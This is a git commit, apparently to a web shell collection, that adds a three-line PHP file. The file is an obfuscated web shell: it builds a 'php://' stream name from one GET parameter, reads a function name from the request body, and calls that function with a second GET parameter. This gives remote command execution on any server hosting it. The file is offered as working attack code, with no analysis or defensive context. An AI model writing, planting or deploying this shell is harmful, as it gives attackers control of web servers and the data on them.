tennc 2022-09-09 23:15:37 +08:00 committed by GitHub
parent 35d39e031c
commit 9691e652c2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

3
php/2022-09-09-05.php Normal file
View file

@ -0,0 +1,3 @@
<?php
$q=$_GET[1];
file_get_contents("php".$q)($_GET[2]);